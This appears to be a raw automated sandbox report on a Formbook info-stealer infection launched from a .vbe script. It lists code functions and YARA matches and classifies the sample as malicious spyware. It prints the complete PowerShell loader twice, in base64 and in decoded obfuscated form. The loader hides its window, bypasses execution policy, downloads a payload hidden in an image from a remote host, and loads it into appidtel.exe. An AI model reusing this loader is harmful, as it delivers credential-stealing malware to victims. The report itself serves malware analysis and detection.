Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038DF0E0 11_2_038DF0E0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038DF7B0 11_2_038DF7B0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0381C7C0 11_2_0381C7C0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03844750 11_2_03844750
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03820770 11_2_03820770
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038D16CC 11_2_038D16CC
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0383C6E0 11_2_0383C6E0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038E0591 11_2_038E0591
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038BD5B0 11_2_038BD5B0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03820535 11_2_03820535
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038D7571 11_2_038D7571
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038CE4F6 11_2_038CE4F6
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038DF43F 11_2_038DF43F
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038D2446 11_2_038D2446
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03811460 11_2_03811460
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0383FB80 11_2_0383FB80
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038D6BD7 11_2_038D6BD7
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0385DBF9 11_2_0385DBF9
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038DAB40 11_2_038DAB40
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038DFB76 11_2_038DFB76
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0381EA80 11_2_0381EA80
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03865AA0 11_2_03865AA0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038BDAAC 11_2_038BDAAC
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038CDAC6 11_2_038CDAC6
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038DFA49 11_2_038DFA49
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038D7A46 11_2_038D7A46
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03893A6C 11_2_03893A6C
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038229A0 11_2_038229A0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038EA9A6 11_2_038EA9A6
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03829950 11_2_03829950
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0383B950 11_2_0383B950
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03836962 11_2_03836962
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038068B8 11_2_038068B8
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038238E0 11_2_038238E0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0384E8F0 11_2_0384E8F0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03822840 11_2_03822840
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0382A840 11_2_0382A840
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03821F92 11_2_03821F92
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038DFFB1 11_2_038DFFB1
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03812FC8 11_2_03812FC8
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0382CFE0 11_2_0382CFE0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038DFF09 11_2_038DFF09
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03840F30 11_2_03840F30
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03894F40 11_2_03894F40
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03832E90 11_2_03832E90
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038DCE93 11_2_038DCE93
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03829EB0 11_2_03829EB0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038DEEDB 11_2_038DEEDB
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038DEE26 11_2_038DEE26
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03820E59 11_2_03820E59
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03838DBF 11_2_03838DBF
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0383FDC0 11_2_0383FDC0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0381ADE0 11_2_0381ADE0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0382AD00 11_2_0382AD00
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03823D40 11_2_03823D40
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038D1D5A 11_2_038D1D5A
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038D7D73 11_2_038D7D73
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038C0CB5 11_2_038C0CB5
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03810CF2 11_2_03810CF2
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038DFCF2 11_2_038DFCF2
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03820C00 11_2_03820C00
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03899C32 11_2_03899C32
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03091B20 11_2_03091B20
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03093359 11_2_03093359
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0309339B 11_2_0309339B
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_030933A0 11_2_030933A0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_030951C0 11_2_030951C0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_030AB7C0 11_2_030AB7C0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0308CA90 11_2_0308CA90
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0308AD26 11_2_0308AD26
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0308AD30 11_2_0308AD30
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0308CCB0 11_2_0308CCB0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0368E338 11_2_0368E338
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0368E7ED 11_2_0368E7ED
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0368E453 11_2_0368E453
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0368CAE3 11_2_0368CAE3
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0368D858 11_2_0368D858
Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exe Code function: 12_2_05461D58 12_2_05461D58
Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exe Code function: 12_2_0545FF33 12_2_0545FF33
Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exe Code function: 12_2_0545FF38 12_2_0545FF38
Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exe Code function: 12_2_05459628 12_2_05459628
Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exe Code function: 12_2_0545FEF1 12_2_0545FEF1
Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exe Code function: 12_2_0545E6B8 12_2_0545E6B8
Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exe Code function: 12_2_05459848 12_2_05459848
Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exe Code function: 12_2_054578C8 12_2_054578C8
Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exe Code function: 12_2_054578BE 12_2_054578BE
Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exe Code function: 12_2_05478358 12_2_05478358
Found potential string decryption / allocating functions
Source: C:\Windows\SysWOW64\appidtel.exe Code function: String function: 0323B970 appears 268 times
Source: C:\Windows\SysWOW64\appidtel.exe Code function: String function: 03285130 appears 36 times
Source: C:\Windows\SysWOW64\appidtel.exe Code function: String function: 03297E54 appears 96 times
Source: C:\Windows\SysWOW64\appidtel.exe Code function: String function: 032CF290 appears 105 times
Source: C:\Windows\SysWOW64\appidtel.exe Code function: String function: 032BEA12 appears 86 times
Source: C:\Windows\SysWOW64\dllhost.exe Code function: String function: 0388EA12 appears 84 times
Source: C:\Windows\SysWOW64\dllhost.exe Code function: String function: 0380B970 appears 266 times
Source: C:\Windows\SysWOW64\dllhost.exe Code function: String function: 03867E54 appears 88 times
Source: C:\Windows\SysWOW64\dllhost.exe Code function: String function: 03855130 appears 36 times
Source: C:\Windows\SysWOW64\dllhost.exe Code function: String function: 0389F290 appears 105 times
Yara signature match
Source: 5.2.appidtel.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 5.2.appidtel.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.2743518891.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000B.00000002.3411918505.0000000003580000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.2744370490.0000000003750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000C.00000002.3413713122.00000000053E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000B.00000002.3409933313.0000000003330000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.2743702515.0000000000B20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000B.00000002.3409365866.0000000003080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000A.00000002.3412088432.0000000002DF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: powershell.exe PID: 6568, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 1492, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engine Classification label: mal100.troj.spyw.expl.evad.winVBE@12/6@7/5
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:380:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_g0mfx1ro.0w2.ps1 Jump to behavior
Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: dllhost.exe, 0000000B.00000003.2923701892.000000000341B000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 0000000B.00000002.3410035281.0000000003411000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 0000000B.00000003.2921298085.00000000033ED000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 0000000B.00000003.2921298085.0000000003411000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 0000000B.00000002.3410035281.000000000343D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: 10092024150836 09.10.2024.vbe Virustotal: Detection: 7%
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\10092024150836 09.10.2024.vbe"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJGVudjpjb21zcEVjWzQsMjYsMjVdLUpPSU4nJykoICgoJ3swfWltJysnYWdlVXJsID0gezF9aHR0cHM6Ly9pYTYwMDEwJysnMi51cy5hcmNoaXZlLm9yZy8zMi9pdGUnKydtcy9kZXRhaC1ub3RlLXZfMjAyNDEwL0RlJysndGFoTm90ZScrJ19WLmpwZyB7MX07ezB9d2ViQ2xpZW50ID0gJysnTmV3LU9iaicrJ2VjdCBTeXN0ZW0uTmV0LldlYkNsaScrJ2UnKydudDt7MH1pbWFnZUJ5dGVzID0gezB9d2ViQ2xpZW4nKyd0LkRvd25sb2FkRGF0JysnYSh7MH1pbWFnZVVybCk7ezB9aW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZScrJ3RTdHJpbmcoezB9aW1hZ2VCeXRlcyk7ezB9cycrJ3RhcnRGbGFnID0gezF9PDxCQVNFNjRfU1RBUlQ+PnsxfTt7MH1lbmRGbGFnID0gezF9PDxCQVNFJysnNjRfRU5EPj57MX07ezB9c3RhcnRJbmRleCA9IHswfWltYWdlVGV4dC5JbmRleE9mKHswfXN0YXJ0RmxhZyk7ezB9ZW5kSW5kZXggPSB7MH1pbWFnZVRleHQuSW5kZXhPZih7MH1lbmRGbGFnKTt7MH1zdGFydEluZGV4IC1nZSAwIC1hbmQgeycrJzB9ZW5kSW5kZXggLWd0IHswfXN0YXJ0SW5kZXg7ezB9c3RhcnRJbmRleCArPSB7MH1zdGFydEZsYWcuTGVuZ3QnKydoO3swfWJhc2U2NExlbmd0aCA9IHswfWVuZEluZGV4IC0gezB9c3RhcnRJbmRleDt7MH1iYXNlNjRDb21tYW5kID0gezB9aW1hZ2VUZXh0LlN1YnN0cmluZyh7MH1zdGFydEluZGV4LCcrJyB7MH1iYXNlNjRMZW5ndGgpO3swfWNvbW1hbmRCeXRlcyA9IFtTeXN0JysnZW0uQ29udmVydF06OkZybycrJ21CYXNlNjRTdHJpbmcoezB9JysnYmFzZTY0Q29tbWFuZCk7ezB9bG9hJysnZGVkQXNzZW1iJysnbHkgPSAnKydbU3lzdGVtLlJlZmxlY3Rpb24uQScrJ3NzZW1ibHldOjpMb2FkKHswfWNvbW1hbmRCeXRlcyk7ezB9dmFpTWV0aG9kID0gW2RubGliLicrJ0lPLkhvbWUnKyddLkdldE1ldGhvZCh7MX1WQUl7MX0pO3swfXZhaU1ldGhvZC5JbnZva2UoezB9bnVsbCwgQCcrJyh7MX0wL2hCUEZtL2QvZWUuZXRzYXAvLzpzcHR0aHsxfScrJywgezF9ZGVzYXRpdmFkb3sxfSwgezF9ZGVzYXRpdmFkb3sxfSwgezF9ZGVzYXRpdmFkb3sxfSwgezF9ZGVzYXRpdicrJ2Fkb3sxfSwgezF9MXsxfSwgezF9YXBwaWR0ZWx7MScrJ30pKTsnKSAtZiAgW2NIQXJdMzYsW2NIQXJdMzkpKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $env:comspEc[4,26,25]-JOIN'')( (('{0}im'+'ageUrl = {1}https://ia60010'+'2.us.archive.org/32/ite'+'ms/detah-note-v_202410/De'+'tahNote'+'_V.jpg {1};{0}webClient = '+'New-Obj'+'ect System.Net.WebCli'+'e'+'nt;{0}imageBytes = {0}webClien'+'t.DownloadDat'+'a({0}imageUrl);{0}imageText = [System.Text.Encoding]::UTF8.Ge'+'tString({0}imageBytes);{0}s'+'tartFlag = {1}<<BASE64_START>>{1};{0}endFlag = {1}<<BASE'+'64_END>>{1};{0}startIndex = {0}imageText.IndexOf({0}startFlag);{0}endIndex = {0}imageText.IndexOf({0}endFlag);{0}startIndex -ge 0 -and {'+'0}endIndex -gt {0}startIndex;{0}startIndex += {0}startFlag.Lengt'+'h;{0}base64Length = {0}endIndex - {0}startIndex;{0}base64Command = {0}imageText.Substring({0}startIndex,'+' {0}base64Length);{0}commandBytes = [Syst'+'em.Convert]::Fro'+'mBase64String({0}'+'base64Command);{0}loa'+'dedAssemb'+'ly = '+'[System.Reflection.A'+'ssembly]::Load({0}commandBytes);{0}vaiMethod = [dnlib.'+'IO.Home'+'].GetMethod({1}VAI{1});{0}vaiMethod.Invoke({0}null, @'+'({1}0/hBPFm/d/ee.etsap//:sptth{1}'+', {1}desativado{1}, {1}desativado{1}, {1}desativado{1}, {1}desativ'+'ado{1}, {1}1{1}, {1}appidtel{1'+'}));') -f [cHAr]36,[cHAr]39))"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\appidtel.exe "C:\Windows\SysWOW64\appidtel.exe"
Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exe Process created: C:\Windows\SysWOW64\dllhost.exe "C:\Windows\SysWOW64\dllhost.exe"
Source: C:\Windows\SysWOW64\dllhost.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJGVudjpjb21zcEVjWzQsMjYsMjVdLUpPSU4nJykoICgoJ3swfWltJysnYWdlVXJsID0gezF9aHR0cHM6Ly9pYTYwMDEwJysnMi51cy5hcmNoaXZlLm9yZy8zMi9pdGUnKydtcy9kZXRhaC1ub3RlLXZfMjAyNDEwL0RlJysndGFoTm90ZScrJ19WLmpwZyB7MX07ezB9d2ViQ2xpZW50ID0gJysnTmV3LU9iaicrJ2VjdCBTeXN0ZW0uTmV0LldlYkNsaScrJ2UnKydudDt7MH1pbWFnZUJ5dGVzID0gezB9d2ViQ2xpZW4nKyd0LkRvd25sb2FkRGF0JysnYSh7MH1pbWFnZVVybCk7ezB9aW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZScrJ3RTdHJpbmcoezB9aW1hZ2VCeXRlcyk7ezB9cycrJ3RhcnRGbGFnID0gezF9PDxCQVNFNjRfU1RBUlQ+PnsxfTt7MH1lbmRGbGFnID0gezF9PDxCQVNFJysnNjRfRU5EPj57MX07ezB9c3RhcnRJbmRleCA9IHswfWltYWdlVGV4dC5JbmRleE9mKHswfXN0YXJ0RmxhZyk7ezB9ZW5kSW5kZXggPSB7MH1pbWFnZVRleHQuSW5kZXhPZih7MH1lbmRGbGFnKTt7MH1zdGFydEluZGV4IC1nZSAwIC1hbmQgeycrJzB9ZW5kSW5kZXggLWd0IHswfXN0YXJ0SW5kZXg7ezB9c3RhcnRJbmRleCArPSB7MH1zdGFydEZsYWcuTGVuZ3QnKydoO3swfWJhc2U2NExlbmd0aCA9IHswfWVuZEluZGV4IC0gezB9c3RhcnRJbmRleDt7MH1iYXNlNjRDb21tYW5kID0gezB9aW1hZ2VUZXh0LlN1YnN0cmluZyh7MH1zdGFydEluZGV4LCcrJyB7MH1iYXNlNjRMZW5ndGgpO3swfWNvbW1hbmRCeXRlcyA9IFtTeXN0JysnZW0uQ29udmVydF06OkZybycrJ21CYXNlNjRTdHJpbmcoezB9JysnYmFzZTY0Q29tbWFuZCk7ezB9bG9hJysnZGVkQXNzZW1iJysnbHkgPSAnKydbU3lzdGVtLlJlZmxlY3Rpb24uQScrJ3NzZW1ibHldOjpMb2FkKHswfWNvbW1hbmRCeXRlcyk7ezB9dmFpTWV0aG9kID0gW2RubGliLicrJ0lPLkhvbWUnKyddLkdldE1ldGhvZCh7MX1WQUl7MX0pO3swfXZhaU1ldGhvZC5JbnZva2UoezB9bnVsbCwgQCcrJyh7MX0wL2hCUEZtL2QvZWUuZXRzYXAvLzpzcHR0aHsxfScrJywgezF9ZGVzYXRpdmFkb3sxfSwgezF9ZGVzYXRpdmFkb3sxfSwgezF9ZGVzYXRpdmFkb3sxfSwgezF9ZGVzYXRpdicrJ2Fkb3sxfSwgezF9MXsxfSwgezF9YXBwaWR0ZWx7MScrJ30pKTsnKSAtZiAgW2NIQXJdMzYsW2NIQXJdMzkpKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $env:comspEc[4,26,25]-JOIN'')( (('{0}im'+'ageUrl = {1}https://ia60010'+'2.us.archive.org/32/ite'+'ms/detah-note-v_202410/De'+'tahNote'+'_V.jpg {1};{0}webClient = '+'New-Obj'+'ect System.Net.WebCli'+'e'+'nt;{0}imageBytes = {0}webClien'+'t.DownloadDat'+'a({0}imageUrl);{0}imageText = [System.Text.Encoding]::UTF8.Ge'+'tString({0}imageBytes);{0}s'+'tartFlag = {1}<<BASE64_START>>{1};{0}endFlag = {1}<<BASE'+'64_END>>{1};{0}startIndex = {0}imageText.IndexOf({0}startFlag);{0}endIndex = {0}imageText.IndexOf({0}endFlag);{0}startIndex -ge 0 -and {'+'0}endIndex -gt {0}startIndex;{0}startIndex += {0}startFlag.Lengt'+'h;{0}base64Length = {0}endIndex - {0}startIndex;{0}base64Command = {0}imageText.Substring({0}startIndex,'+' {0}base64Length);{0}commandBytes = [Syst'+'em.Convert]::Fro'+'mBase64String({0}'+'base64Command);{0}loa'+'dedAssemb'+'ly = '+'[System.Reflection.A'+'ssembly]::Load({0}commandBytes);{0}vaiMethod = [dnlib.'+'IO.Home'+'].GetMethod({1}VAI{1});{0}vaiMethod.Invoke({0}null, @'+'({1}0/hBPFm/d/ee.etsap//:sptth{1}'+', {1}desativado{1}, {1}desativado{1}, {1}desativado{1}, {1}desativ'+'ado{1}, {1}1{1}, {1}appidtel{1'+'}));') -f [cHAr]36,[cHAr]39))" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\appidtel.exe "C:\Windows\SysWOW64\appidtel.exe" Jump to behavior
